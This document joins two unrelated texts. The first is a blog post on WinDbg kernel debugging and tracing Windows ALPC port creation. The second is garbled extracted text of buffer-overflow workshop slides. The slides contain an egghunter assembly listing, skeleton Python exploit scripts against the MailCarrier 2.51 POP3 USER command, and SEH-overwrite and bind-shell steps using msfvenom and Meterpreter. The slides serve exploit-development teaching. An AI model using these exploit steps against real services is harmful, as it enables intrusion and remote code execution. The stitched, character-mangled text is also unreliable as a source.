11 values
 0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Debugging and Reversing ALPC 29 May 2022 >> Introduction & Disclaimer >> Environment Preparation >> Getting Off The Ground >> From User to Kernel Land >> Hunting An ALPC Object This post is an addendum to my journey to discover and verify the internals of ALPC, which I’ve documented in Offensive Windows IPC Internals 3: ALPC. While preparing this blog I gured a second post, explaining the debugging steps I took to verify and discover ALPC behaviour, could be useful to all of us that are beginners in the eld of reverse engineering and/or debugging. Contents: Introduction & Disclaimer While I’ve certainly used the techniques and methods shown in this post below, these where not my only resources and tools to dive into ALPC. Even implying this would undermine the important and major work of other researchers that have documented and reversed ALPC internals in the past, like Alex Ionescu and many others. Hence this disclaimer. TL;DR: The techniques below are practical and useful, but I was only able to apply them due to the work of others. Another important disclaimer is: I am - by no means - an experienced reverse engineer and this blog post is not meant to be an introduction into ‘how to become a reverse engineer’ or show a smart way to get in this eld. This is a ‘use Windows debugging to stumble into a topic and make your way to look around’ post. In order to follow the steps shown below you want to set up a kernel debugging environment. If you already have a kernel debugging environment set up, feel free to skip to section Getting Off The Ground. If you don’t, you’ve got two basic choices for this setup: >> Local live kernel debugging >> Remote kernel debugging Although the local kernel debugging option only requires a single test machine (virtual VM) and only a single command and a reboot to set you up, I nevertheless recommend starting two machines (VMs) and set up for remote debugging. The reason for this is that local live kernel debugging comes with some constrains and you can’t use the full debugging feature set and can’t go all routes. I’ll nevertheless include the steps to set up local kernel debugging as well, in case you only have a single machine at hand in your test environment. Setup local kernel debugging The following steps needs to be done: 1. Start up your testing machine or VM 2. If you do not already have WinDbg installed, download and install the WindowsSDK from here to install WinDbg. Alternatively you can also use the WinDbg Preview from the Windows Store App. 3. Open up PowerShell with administrative privileges and run the following command to enable local kernel debugging: PS:> bcdedit /debug on & bcdedit /dbgsettings local 4. Reboot your machine 5. Open up WinDbg and enter local kernel debugging mode by running the following command: .\windbg.exe -kl Alternatively you can also open up the WinDbg GUI, click File » Kernel Debug (Ctrl+K) » Local (Tab) » Ok Environment Preparation Local Kernel Debugging with WinDbg A note about the customized layout shown above In my case I like to have my debugging windows positioned and aligned in a certain way (and also have the colors mimic a dark theme). You can do all of that by starting WinDbg, open up and position all Windows the way you like them, change the coloring (if you want) under View » Options » Colors and nally save all your Workspace setup via File » Save Workspace to File. Once done, you can open up your local kernel debugging WinDbg with your customized Workspace as follows: .\windbg.exe -WF <Path-To-File>.WEW -kl All WinDbg command line switches can be found here Setup remote kernel debugging 1. Start your rst testing machine or VM that you want to debug, this will be referred to as debuggee machine. 2. If you do not already have kdnet.exe installed, download and install the WindowsSDK from here to install it. 3. Open up PowerShell with administrative privileges and run the following command: cd "C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\\" && .\kdnet.exe <DEBUGER-IP> <RandomHighPortNumber>' I usually use *51111 as port number. This command will give you command line instructions to use from your debugger, see step 6.* 4. Start your second testing machine or VM that you want to use to debug your rst VM, this will be referred to as debugger machine. 5. If you do not already have WinDbg installed, download and install the WindowsSDK from here to install it. Alternatively you can also use the WinDbg Preview from the Windows Store App. 6. Run the following command to start WinDbg and attach it to your debuggee machine: cd "C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\" && .\windbg.exe -k <PASTE-OUTPUT- FROM-kdnet.exe-FROM-YOUR-DEBUGGEE> . The command to paste from kdnet.exe (Step 3.), will look something like this: net:port=<YOUR-RANDOM-PORT>,key=.... You will see a prompt indicating that the debugger is set up and is waiting to be connected. 7. Reboot the debuggee machine. Switch back to your debugger machine, which will connect during the boot process of your debuggee. You may have noted that I’ve mentioned the WinDbg Preview store app as an alternative to the classic WinDbg debugger. This preview version is a facelift version of the classic debugger and comes with quite a different UI experience (including a built-in dark-theme). If you’re looking at a one-time setup and are not emotionally attached to the old/classic WinDbg I encourage you to try the WinDbg Preview. The only reason I’m not using it yet is due to the fact that you can’t export your Workspace setup (window layout), which is a crucial feature for me in my lab (which i rebuild frequently). As a result of that I will be using classic WinDbg in the below Setting up symbols Once you’ve setup WinDbg the last preparation step you’ll need to take is to setup your debugger to pull debugging symbols form Microsoft’s ofcial symbol server. Run the following set of commands within WinDbg to set up symbols: 1. Within WinDbg run .sympath to show your current symbol path conguration. If it looks similar to the below, which species that you want your symbols to be loaded from Microsoft’s symbol server and cache those in C:\Symbols, you’re good to go… WinDbg .sympath check 2. If your output does not look like this and you simply want to pull all your symbols from Microsoft’s ofcial symbol server, run the following command within WinDbg: .sympath srv*https://msdl.microsoft.com/download/symbols More about symbol servers, caching and the how & why can be found in Microsoft’s documentation page here. Let’s say we know nothing at all about ALPC and want to start digging and understanding how ALPC works under the hood. As ALPC is undocumented we cannot start our journey by sticking our head into Microsoft’s rich documentation catalogues, but instead we have to a apply a methodology that is based on a loop of reversing, making assumptions, testing assumptions and verication/falsication of assumptions to nally build our picture of ALPC. Getting Off The Ground Alright, if we do not know anything about a technology beside its name (ALPC), we can ring up our WinDbg kernel debugger and start to get some information about it by resolving function calls that contain the name “ALPC” - this might not be the smartest starting point, but that doesn’t matter, we start somewhere and make our way… The WinDbg command we need for this is: kd:> x *!*Alpc* Listing ALPC functions This command will resolve function names of the following pattern [ModuleName]![FunctionName] , where we can use wildcards (‘*’) for both the module and function names. In this case that means we’re resolving all functions that contain the word “Alpc” in their names within all loaded modules. In case it’s your rst time with WinDbg (or you’re like me and tend to forget what certain commands mean), you can always use WinDbg’s help menu to lookup a command via: kd:> .hh [Command] , as shown below: WinDbg's help menu Side note: Although the command you’ve entered is pre-selected you actually have to click the ‘Display’ button. Another option is to lookup the Debugger commands online here. If you get an error saying that that something could not be resolved, you likely do not have your symbol path set up. Ensure you have your symbols either stored locally or pulling from https://msdl.microsoft.com/download/symbols (or both). You can check your sympath with: .sympath WinDbg .sympath command If you have your symbol path setup correctly, you’ll receive a good amount of results showing all sorts of functions that contain the name “ALPC”. If things take too long (because you made a typo, or things can’t be resolved or any other problem occurs) you can always hit <CTRL>+<Break> or open the Debug menu and click Break to stop the current action: WinDbg's 'Break' command From here you should copy all the resolved functions into an editor of your choice (I use VisualStudio Code) and sort these by name to get a feeling for which Alpc functions exists in which modules and may belong to which components. The strong naming convention applied to the Windows codebase will help you a lot here, so let’s have a look at this: Example of function naming convenction in Windows To make this more readable: 00007ff9`49498c54 >> The function address ntdll >> The module name ("ntddl" in this case) ! >> The seperator Tp >> Abbreviation of the component ("Thread Poo l" in this case) p >> Abbreviation of the function type ("privat e") AllocAlpcCompletion >> Descriptive name of the functions Looking only at this very rst resolved function call we can make the assumption that this function is a private function within the ThreadPool component within ntdll.dll, which likely does some allocation of some memory for something. Applying this knowledge to all listed functions, we can sort and organize the resolved functions to create a rough picture of where (in the codebase) these are implemented: Sorted ALPC functions The value of this step is not being a 100 percent accurate or getting a label assigned to each function, but instead create a rough mapping of which parts of the OS are concerned with ALPC and which of these modules and function names sound familiar and which don’t. From here on we can drill down into modules that sound familiar (or interesting) to us. For example we have spotted the ntdll module, which we know is the userland border gateway for calling native system (kernel) services (functions). So we can assume that Windows allows userland processes to call certain ALPC functions, which comes down the the assumption of “ALPC is usable from userland applications”. Looking only at “*Alpc*” functions inside the ntdll module we can nd that there are 4 types of functions: >> No-component functions, e.g.: ntdll!AlpcRegisterCompletionList >> Nt-component functions, e.g.: ntdll!NtAlpcCreateResourceReserve >> Zw-component functions, e.g.: ntdll!ZwAlpcCreateResourceReserve >> Tp-Component functiosn, e.g.: ntdll!TppAllocAlpcCompletion As the Nt and Zw functions are meant to call the same kernel functions (see here, here and here for why they exist), we can safely ignore one them, so we’ll cut off the Zw functions. I myself am not too familiar with the thread pool manager, so I’ll drop the Tp functions as well, which leaves us with a much smaller set of potentially interesting functions: Sample selection of ALPC function Once again the goal here is not to select a specic set of functions, but instead just making a selection based on something. It’s always a good idea to select things you know or that sound familiar and cycle down a learning path from there… The upper list of the no-component ALPC functions does have a lot of function names containing the words “CompletionList”, which might or might not sound familiar to you. The bottom list of Nt ALPC functions on the other hand appears quite heterogeny and based on the Nt component naming convention I would assume that these functions are meant to be gateway functions from user-land to kernel-land. We’ve drilled down this far so let’s take one these functions and start the reversing job. There is no right and wrong in picking one, you can be lucky and pick a function that is meant to be used during the early stage of an ALPC setup, which has further hints on how to use ALPC, or one might unknowingly pick a function that is only meant for special ALPC scenarios… the joy of undocumented stuff… At this point we can’t know which function is a good starting point, so let’s choose one that at least sounds like its meant to be used at the start of a process, like something with Create in its name: Selected function: NTAlpcCreatePort I obviously already know that this function is going to be useful, so forgive me the “let’s pick something randomly”-dance. Let’s re up Ghidra and have a look at the NtAlpcCreatePort function within ntdll.dll : NtAlpcCreatePort in Ghidra Ok… this is not increadibly helpful… and also looks odd. A syscall is made with no arguments and the function then returns the integer 0x79… Double checking this decompiled code with the actual instructions displayed right next to the decompiled window, does show a different picture: From User to Kernel Land NtAlpcCreatePort in Ghidra with assembly code The actual code instructions show that the integer value 0x79 is moved into EAX and then the syscall is made. Quickly double checking this with IDA Free to be sure: NtAlpcCreatePort in IDA Free Yep, okay that makes more sense. First take away here is: Ghidra is a really great tool, the decompilation feature can be aky (even for simple functions), but on the other hand: Automated decompilation is a massive feature that is handed out for free here, so no hard feelings about some errors and manual double checking effort. We gured the NtAlpcCreatePort function within ntdll.dll is pretty much calling into kernel mode right away using the syscall number 0x79 (121 in decimal). From here we got three options to continue: >> Head to the kernel straight away and look for a function with a similar name and hope that we get the right one (ntdll and kernel function names are often very similar) - This is the least reliable method. >> Lookup the syscall number (0x79) online to nd the corresponding kernel function. >> Manually step through the process of getting and resolving the syscall number on your host system - This is the most reliable method. Let’s skip lazy option 1 (least reliable) and check out options two and three. Lookup Syscall number online One of the best (and most known) resources to lookup syscall numbers is https://j00ru.vexillium.org/syscalls/nt/64/ (x86 syscalls can be found here). Syscall reference from https://j00ru.vexillium.org/syscalls/nt/64/ For my Windows 10 20H2 system this great online resource directly points me to a kernel function named “NtAlpcCreatePort”. Stepping through the syscall manually I’ve learned and applied the process from www.ired.team, all credits and kudos go to ired.team ! We can use WinDbg to manually extract the corresponding kernel function from our debugged host systems. There are 6 steps involved here: 1. Setting a breakpoint in ntdll at ntdll!NtAlpcCreatePort to jump into the function. This can be done through the following WinDbg command: kd:> bp ntdll!NtAlpcCreatePort 2. Verify our breakpoint is set correctly, via: kd:> bl List breakpoints in WinDbg 3. Let the debuggee run until this breakpoint in ntdll is hit: kd:> g 4. Ensure we are at the correct location and have the syscall right ahead: kd:> u . (unassemble the next following instructions) Disassembled syscall in WinDbg 5. Lookup the offset in the SSDT (System Service Descriptor Table) for the syscall number, 0x79: kd:> dd /c1 kiservicetable+4*0x79 L1 6. Checking the address of the syscall function using the SSDT offset: kd:> u kiservicetable + (02b62100>>>4) L1 All these steps can be found in the screenshot below: Dispatching a syscall in WinDbg Using either of these three methods we would have come to the result that ntdll!NtAlpcCreatePort calls into the kernel at nt!NtAlpcCreatePort Now we’ve gured that we end up calling the kernel in nt!NtAlpcCreatePort , so let’s have a look at this. We can re up IDA Free (Ghidra would’ve been just as ne), open up ntoskrnl.exe from our system directory, e.g. C:\Windows\System32\ntoskrnl.exe, load Microsoft’s public symbols, and we should be able to nd the function call NtAlpcCreatePort . From there on we can browse through the functions that are called to get a rst idea of what’s going on under the hood for this call. NtAlpcCreatePort in IDA Free Following the rst few function calls will route us to a call to ObCreateObjectEx , which is an ObjectManager (Ob) function call to create a kernel object. That sounds like our ALPC object is created here and IDA also tells us what type of object that is, two lines above the marked call in the window on the right, a AlpcPortObjectType . At this point I’d like to try to get a hold of such an object to get a better understanding and insight of what this actually is. As the function ObCreateObjectEx will create the object the plan here is to switch back to Hunting An ALPC Object WinDbg and set a breakpoint right after this call to nd and inspect the created object. NtAlpcpCreatePort breakpoint in WinDbg After placing this breakpoint we hit g to let WinDbg run and once it hits we check if we can nd the created object being referenced somewhere. The reliable method for this is to follow the object creation process in ObCreateObjectEx and track where the object is stored once the function nishes (the less reliable option is to check the common registers and the stack after the function nishes). In this case we can nd the created ALPC object in the RCX register once we hit our breakpoint. ALPC port object in WinDbg Sweet we found a newly created ALPC port object. At this point the !object command can tell us the type of the object, the location of its header and its name, but it can’t add additional detail for this object, because it does not now its internal structure. We do not know either, but we could check if there is a matching public structure inside the kernel that we can resolve. We’ll try that with kd:> dt nt!*Alpc*Port … Resolved _ALPC_PORT structure in WinDbg We once again used wildcards combined with the information we obtained so far, which are: We’re looking for a structure inside the kernel module (nt) and we’re looking for a structure that matches an object that we knew is of type AlpcPortObjectType. The naming convention in Windows often names structures with a leading underscore and all capital letters. The rst hit ntkrnlmp!_ALPC_PORT looks like a promising match, so let’s stuff our captured ALPC port object in this structure: Applied _ALPC_PORT structure in WinDbg That does indeed look like a match, however some attributes, that one would expect to be set, are empty, for example the “OwnerProcess” attribute. Before we throw our match in the bin, let’s remember we’re still in the breakpoint right after ObCreateObjectEx , so the object has just been created. Walking back through functions we’ve traversed in IDA, we can nd that there are a couple more functions to be called within the AlpcpCreateConnectionPort function, such as AlpcpInitializePort , AlpcpValidateAndSetPortAttributes and others. Sounds like there is more to come that we want to catch. Right now, we’re in some process that created an ALPC port (so far we didn’t even bother to check which process that is) and we want to jump to a code location after all the initialization functions are completed and check what our ALPC port structure looks like then, so here’s a rundown of what we want we want to do: 1. We want to note down the address of our ALPC object for later reference. 2. We want to nd the end of the AlpcpCreateConnectionPort function. 3. We want to jump to this location within the same process that we currently are in, 4. We want to load our noted ALPC object into the ntkrnlmp!_ALPC_PORT structure to see what it looks like. And here’s how to do that… 1. Noting down the ALPC object address… Done: ffffac0e27ab96e0 Noting down the ALPC Port object reference 2. Finding the end of AlpcpCreateConnectionPort … Done jumping to 0xfffff803733823c9 Finding the end of the AlpcpCreateConnectionPort function 3. Jump to this address within the same process can be done using this command kd:> bp /p @$proc fffff803733823c9 Note: I’m also checking in which process I am before and after the call just to be on the safe side Jumping to the located address 4. Check ALPC Objet structure again… Re-applied _ALPC_PORT structure in WinDbg That looks more complete and we could walk through an all setup ALPC object from here as easy as using the links provided by WinDbg to inspect what other structures and references are linked to this object. Just for the sake of providing an example and to double conrm that this ALPC Port object is indeed owned by the svchost.exe process that we identied above, we can inspect the _EPROCESS structure that is shown at ntkrnlmp!_ALPC_PORT + 0x18 : _EPROCESS structure of the owning process in WinDbg We nd the ImageFileName of the owning process of the ALPC object that we’ve caught to be “svchost.exe”, which matches with the process we’re currently in. At this point we’ve found an all setup ALPC port object that we could further dissect in WinDbg to explore other attributes of this kernel object. I’m not going any deeper here at this point, but if you got hooked on digging deeper feel free to continue the exploration tour. If you’re following this path, you might want to explore the ALPC port attributes assigned to the port object you found, which are tracked in the nt!_ALPC_PORT_ATTRIBUTES structure at nt!_ALPC_PORT + 0x100 to check the Quality of Service (QOS) attribute assigned to this object ( nt!_ALPC_PORT + 0x100 + 0x04 ). If you found an ALPC port object with an (QOS) impersonation level above SecurityIdentication, you might have found an interesting target for an impersonation attack, detailed in my previous post Offensive Windows IPC Internals 3: ALPC. _SECURITY_QUALITY_OF_SERVICE structure of the identied ALPC port object in WinDbg In this case, it’s only SecurityAnonymous, well… By now you should be all set up to explore and dig into ALPC. The rst steps are obviously going to be slow and you (and I) will take a few wrong turns, but that is part of everyone’s learning experience. If I could add a last note to aid in getting on a joyful ride it’s this: I personally enjoy reading good old, paperback books, to learn, dig deeper and to improve my skillset with Windows internals. If you are of similar kind, you might as well enjoy these book references (if you not already have them on your desk): >> Windows Internals Part 1 >> Windows Internals Part 2 >> Inside Windows Debugging >> Windows Kernel Programming There already is a published 1st edition of this, but if you want the latest and greates you might want to wait for @zodiacon’s new release. … Enjoy your ride ;) … Other Posts Offensive Windows IPC Internals 3: ALPC 24 May 2022 Offensive Windows IPC Internals 2: RPC 21 Feb 2021 Offensive Windows IPC Internals 1: Named Pipes 10 Jan 2021
Hack%to%Basics%–%x86%Windows%Based%Buffer%Overflows,%an%introduc:on%to%buffer%overflows% Instructor%-%Dino%Covotsos%– Telspace%Systems% Co–Instructor%–%Manuel%Corregedor% @telspacesystems% Whoami'(x2)'?' We%work%in%the%Penetra:on%Tes:ng%space%(Telspace%Systems)% % Approximately%20%years%in% % Trying%to%keep%some%sort%of%work/life%balance!%;)% % Various%qualifica:ons,%degrees%etc% Agenda' -%Introduc:on%to%the%workshop(We%are%here!).% -%The%Stack%and%Registers.% -%Basic%x86%ASM.% -%Basic%exploita:on%techniques.% -%Fuzzing.% -%Introduc:on%to%variety%of%Skeleton%Python%scripts(copy% paste%buffer%overflows,%remote%buffer%overflows%etc).% Agenda' -%Vanilla%EIP%overwrites%in%Immunity%Debugger.% -%Overwri:ng%EIP,%Jumping%to%ESP,%execu:ng%Shellcode% (generated%by%Metasploit%or%compiled%from%exploit-db/ shellstorm).% -%Bad%characters%and%how%to%deal%with%them.% -%Prac:cal%example.% Agenda' -%Introduc:on%to%SEH%exploita:on%techniques.% -%Introduc:on%to%Mona,%basic%asm%jumps%and%shell%coding.% -%Prac:cal%examples.% Agenda' -%What%are%egg%hunters?%% -%Example%of%a%egg%hunter%being%u:lised%in%a%SEH%exploit.% -%Ques:ons%and%Answers.%% -%References.% The%Stack%and%Registers(x86)% The%8%32%bit%General%Purpose%Registers:% % Accumulator%register%(AX).%Used%in%arithme:c%opera:ons% Counter%register%(CX).%Used%in%shid/rotate%instruc:ons%and%loops.% Data%register%(DX).%Used%in%arithme:c%opera:ons%and%I/O%opera:ons.% Base%register%(BX).%Used%as%a%pointer%to%data%(located%in%segment%register%DS,%when%in% segmented%mode).% Stack%Pointer%register%(SP).%Pointer%to%the%top%of%the%stack.% Stack%Base%Pointer%register%(BP).%Used%to%point%to%the%base%of%the%stack.% Source%Index%register%(SI).%Used%as%a%pointer%to%a%source%in%stream%opera:ons.% Des:na:on%Index%register%(DI).%Used%as%a%pointer%to%a%des:na:on%in%stream%opera:ons.% The%Stack%and%Registers(x86)% REF:%hep://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html% Basic%x86%ASM% X86%ASM%(for%this%workshop):% % add/sub% xor% mov% push% pop% call% jmp%(and%condi:onal%jumps)% % %Basic%exploita:on%techniques% “Vanilla”'EIP'Overwrite:' % Direct%EIP%overwrite%with%ini:al%long%buffer(no%excep:on%handler%or%similar)% % Structured'ExcepGon'Handling(SEH)'exploitaGon:' % An%excep:on%is%an%event%that%occurs%during%the%execu:on%of%a%program,%and%requires% the%execu:on%of%code%outside%the%normal%flow%of%control.%Structured%excep:on% handling%is%a%mechanism%for%handling%both%hardware%and%sodware%excep:ons.%% % Overwrite%SEH%with%a%POP%POP%RET%instruc:on,%ESP%moved%towards%higher%instruc:ons% twice%then%a%RET%is%executed.% REF:%heps://docs.microsod.com/en-us/windows/desktop/debug/structured-excep:on-handling% %Basic%exploita:on%techniques% Structured'ExcepGon'Handling(SEH)'exploitaGon(conGnued):' ' Typical%structure:% % “A”%buffer%+%(Next%SEH)/JMP%+%PPR%+%(nops)%+%shellcode% %Basic%exploita:on%techniques% Egghunters:' ' A%egghunter%is%a%small%piece%of%shellcode%that%searches%memory%for%a%larger,%bigger% shellcode%where%it%may%be%possible%to%execute%said%shellcode%(i.e.%in%cases%where%there% is%only%a%small%amount%of%space%available%in%the%buffer,%this%is%very%useful)% % Egghunters%search%for%a%“TAG”%which%is%a%unique%4%byte%string,%in%memory.%We%then% combine%a%string%together%so%that%it%is%unique,%such%as%WOOTWOOT%or%similar%where% we%want%to%execute%our%actual%shellcode%once%found(i.e.%we%redirect%execu:on%flow).% %Basic%exploita:on%techniques% Egghunters,'example:' ' loop_inc_page:% or dx, 0x0fff // Add PAGE_SIZE-1 to edx loop_inc_one:% inc edx // Increment our pointer by one loop_check:% push edx // Save edx push 0x2 // Push NtAccessCheckAndAuditAlarm pop eax // Pop into eax int 0x2e // Perform the syscall cmp al, 0x05 // Did we get 0xc0000005 (ACCESS_VIOLATION) ? pop edx // Restore edx loop_check_8_valid:%% %je%%%%loop_inc_page%%%%%%%%%%%%%%%%%//%Yes,%invalid%ptr,%go%to%the%next%page% % is_egg:% %mov%%%eax,%0x50905090%%%%%%%%%%%%%%%//%Throw%our%egg%in%eax% %mov%%%edi,%edx%%%%%%%%%%%%%%%%%%%%%%//%Set%edi%to%the%pointer%we%validated% %scasd%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%//%Compare%the%dword%in%edi%to%eax% %jnz%%%loop_inc_one%%%%%%%%%%%%%%%%%%//%No%match?%Increment%the%pointer%by%one% %scasd%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%//%Compare%the%dword%in%edi%to%eax%again%(which%is%now%edx%+%4)% %jnz%%%loop_inc_one%%%%%%%%%%%%%%%%%%//%No%match?%Increment%the%pointer%by%one% % matched:% %jmp%%%edi%%%%%%%%%%%%%%%%%%%%%%%%%%%//%Found%the%egg.%%Jump%8%bytes%past%it%into%our%code.' REF:%hep://www.hick.org/code/skape/papers/egghunt-shellcode.pdf%%&%heps://www.fuzzysecurity.com/tutorials/expDev/4.html%% Fuzzing% Google'DefiniGon:' % Fuzzing%or%fuzz%tes:ng%is%an%automated%sodware%tes:ng%technique%that%involves% providing%invalid,%unexpected,%or%random%data%as%inputs%to%a%computer%program.%The% program%is%then%monitored%for%excep:ons%such%as%crashes,%failing%built-in%code% asser:ons,%or%poten:al%memory%leaks.% ' Manual'TesGng'(GeneraGon,'mutaGon,'manual'coding'etc)' ' Tools:'Spike,'Boofuzz,'Peach,'Sulley'etc' Fuzzing% Basic%Spike%Template:% ' s_string_variable("USER");% s_string(" "); s_string_variable(”FOO");% s_string("\r\n"); s_string("PASS%");% s_string_variable(”F00");% s_string_variable("\r\n");% % Skeleton%Python%Scripts% On%your%USB/VM%there%are%addi:onal%scripts:% ' Copy/Paste'Skeleton'Python'Scripts'(Local'BOF'example,'SEH)' ' Shellcode = “<SHELLCODE>” buffer = "A" * 884 + NSEH + SEH" + NOPS + shellcode + "D" * 8868 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created” ' Skeleton%Python%Scripts% Socket'Based'Skeleton'Python'Scripts'(Local'BOF'example,'Vanilla)' ' buffer = "A" * 5094 + ”JMP ESP" + NOPS + "C" * (882-len(shellcode)) print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("", 110)) print s.recv(1024) s.send('USER ' + buffer + '\r\n') print s.recv(1024) s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, but if you get here the exploit failed!" Vanilla%EIP%Overwrite% '41414141'–'The'Magic'Numbers.' Our%aim%in%this%por:on%of%the%workshop%is%to%overwrite%the%EIP%register%by%sending%a% long%string,%which%will%allow%us%to%redirect%program%execu:on%flow%to%shellcode%of%our% choosing.%In%this%case,%it%would%be%calc.exe%or%a%bind%shell.%% % Vanilla%EIP%Overwrite%(MailCarrier)% % Vanilla%EIP%Overwrite%(MailCarrier)% % Aeaching%to%the%MailCarrier%process,%using%Immunity%Debugger%(on%your%VM)% Vanilla%EIP%Overwrite%(MailCarrier)% % Vanilla%EIP%Overwrites%(MailCarrier)% % Skeleton%Python%Script,%which%will%send%6000%A’s%via%“USER”(on%your%VM)% Vanilla%EIP%Overwrite%(MailCarrier)% % Overwri:ng%EIP%with%“41414141”% Vanilla%EIP%Overwrite%(MailCarrier)% % Genera:ng%a%unique%paeern%with%msf-paeern_create%with%length%6000% Vanilla%EIP%Overwrite%(MailCarrier)% % Python%script,%with%unique%paeern%to%send%to%MailCarrier% Vanilla%EIP%Overwrite%(MailCarrier)% % Execu:ng%the%script,%which%carries%the%unique%paeern.% Vanilla%EIP%Overwrite%(MailCarrier)% % Obtaining%EIP%overwrite%with%a%unique%paeern,%we%copy%this%value%to%find%the%exact%offset.% Vanilla%EIP%Overwrite%(MailCarrier)% % Using%msf-paeern_offset%in%order%to%obtain%the%exact%offset,%in%this%case%5094%bytes.% Vanilla%EIP%Overwrite%(MailCarrier)% % We%create%our%“B”%buffer,%to%confirm%the%exact%offset%and%EIP%overwrite.% Vanilla%EIP%Overwrite%(MailCarrier)% % Confirming%the%correct%offset%and%EIP%overwrite%via%42424242%(“B”%*%4)% Vanilla%EIP%Overwrite%(MailCarrier)% % We%search%for%a%JMP%ESP%to%overwrite%EIP%with,%via%mona%with%“!mona%jmp%–r%esp”% Vanilla%EIP%Overwrite%(MailCarrier)% % Adding%the%JMP%to%the%Python%script.% Vanilla%EIP%Overwrite%(MailCarrier)% % We%place%a%breakpoint%at%that%address,%and%wait%for%the%breakpoint%to%be%hit,%confirming%jmp.% Vanilla%EIP%Overwrite%(MailCarrier)% % We%step%through%the%instruc:ons%and%confirm%that%we%land%in%our%“C”%buffer.% Vanilla%EIP%Overwrite%(MailCarrier)% % Genera:ng%our%bind_tcp%shellcode,%with%msfvenom.% Vanilla%EIP%Overwrite%(MailCarrier)% % Placing%it%in%to%our%Python%script%(1/2).% Vanilla%EIP%Overwrite%(MailCarrier)% % Placing%it%in%to%our%Python%script%%(2/2).% Vanilla%EIP%Overwrite%(MailCarrier)% % Execu:ng%our%Python%script%(full%exploit).% Vanilla%EIP%Overwrite%(MailCarrier)% % Obtaining%our%bind%shell%on%port%443.% Vanilla%EIP%Overwrite%(MailCarrier)% % Using%Meterpreter%to%connect%to%the%bind%shell.% SEH%exploita:on% '41414141'–'SGll'the'magic'numbers,'just'different!' Structured%excep:on%handling%exploits%compromise%an%applica:on%by%overwri:ng%the% pointer%of%an%excep:on%handler%with%an%aeacker%controlled%address.% % The%“Structured'ExcepGon'Handler%(SEH)”%is%a%protec:on%mechanism%that%was% implemented%to%mi:gate%the%abuse%of%buffer%overflows,%but%it%is%a%highly%flawed%one.% REF:%heps://www.fuzzysecurity.com/tutorials/expDev/3.html%% SEH%exploita:on% Skeleton%Python%script%to%exploit%the%LIST%command,%post%authen:ca:on%(test/test)% SEH%exploita:on% Sending%10000%A’s%via%the%LIST%command.% SEH%exploita:on% EIP%is%not%overwrieen,%but%we%con:nue%program%execu:on.% SEH%exploita:on% EIP%is%now%overwrieen,%the%SEH%chain%our%A’s.% SEH%exploita:on% In%the%same%way%as%the%previous%exploit,%we%use%msf%to%create%a%unique%paeern%with%10000% bytes.% SEH%exploita:on% Python%script%with%the%paeern.% SEH%exploita:on% SEH%chain%shows%overwrite,%we%then%match%that%with%msf-paeern_offset%to%6178%bytes.% SEH%exploita:on% We%modify%our%buffer%to%overwrite%nseh%and%seh%with%“BBBB”%and%“CCCC”.% SEH%exploita:on% SEH%Chain%now%shows%we%control%nseh%and%seh%accordingly.% SEH%exploita:on% We%use%“!mona%seh”%to%search%for%a%POP%POP%RET%instruc:on.% SEH%exploita:on% Our%PPR%instruc:on%is%then%added%to%our%exploit,%with%nseh%added%as%“G”%*%4.% SEH%exploita:on% We%place%a%breakpoint%at%our%PPR%instruc:on,%to%make%sure%it%is%being%executed%properly.% SEH%exploita:on% We%execute%our%PPR%instruc:on,%and%jump%to%our%4%“G”%buffer,%which%we%can%now%use%to%jump.% SEH%exploita:on% We%use%these%4%bytes,%to%assemble%a%JMP%SHORT%to%a%value%ader%the%handler(EB12)% SEH%exploita:on% We%modify%our%Python%script%to%add%our%nseh%jump%and%some%nops(we%want%to%land%in%the%nops).% SEH%exploita:on% Using%breakpoints%and%stepping%through,%we%finally%land%in%our%nops%and%can%add%our%shellcode.% SEH%exploita:on% Using%msfvenom,%we%generate%our%bind%shell%once%again.% SEH%exploita:on% We%add%this%to%our%final%exploit(1/2).% SEH%exploita:on% We%add%this%to%our%final%exploit(2/2).% SEH%exploita:on% We%then%run%the%final%Python%exploit,%and%hope%to%get%a%bind%shell%on%the%target.% SEH%exploita:on% Success,%we%have%our%bind%shell%wai:ng%on%port%443.% SEH%exploita:on% Connected%to%our%bind%shell%via%MSF.% Egg%hunters% Playing'with'limited'buffer'space'can'be'fun!' ' An%egg%hunter%is%a%small%piece%of%shellcode%that%will%search%memory%for%a%specific% paeern.%Once%this%is%found,%it%will%then%execute%the%full%shellcode%in%a%larger%area%of% available%buffer%space(some:mes%done%via%another%stored%variable)%.% % We%will%expand%upon%the%SEH%exploit%from%the%previous%example,%with%the%use%of%a%egg% hunter%to%find%our%shellcode.% ' % Addi:onal%informa:on:%heps://www.corelan.be/index.php/2010/01/09/exploit-wri:ng-tutorial-part-8-win32-egg-hun:ng/% Egg%hunters% We%start%with%our%skeleton%Python%script,%which%uses%nseh,%seh%and%nops(no%shellcode%this%:me).%% Egg%hunters% We%land%in%our%nops%as%expected,%which%will%allow%us%to%create%and%execute%our%egg%hunter.% Egg%hunters% Using%msf-egghunter%to%generate%our%egghunter,%with%x00%as%the%only%bad%char,%tag%of%WOOT.% Egg%hunters% Adding%the%egghunter%to%our%code,%also%including%the%WOOTWOOT%tag%just%ader%ini:al%“A”%buffer% Egg%hunters% Execu:ng%our%script%with%our%Egg%hunter,%if%all%goes%well%we%should%find%WOOTWOOT%in%memory.% Egg%hunters% Our%egghunter%tag%is%found,%we%can%now%place%nops%and%shellcode!% Egg%hunters% Once%again,%we%generate%our%shellcode%using%msfvenom.% Egg%hunters% Adding%the%shellcode%to%our%exploit%(1/2).% Egg%hunters% Adding%the%shellcode%to%our%exploit%(2/2).% Egg%hunters% Running%our%final%exploit%with%egg%hunter%and%shellcode.% Egg%hunters% By%sexng%breakpoints%and%stepping%through%the%execu:on,%we%can%see%our%egg%hunter.% Egg%hunters% We%set%another%strategic%breakpoint,%ader%our%WOOTWOOT%is%found%in%memory,%then%con:nue.% Egg%hunters% 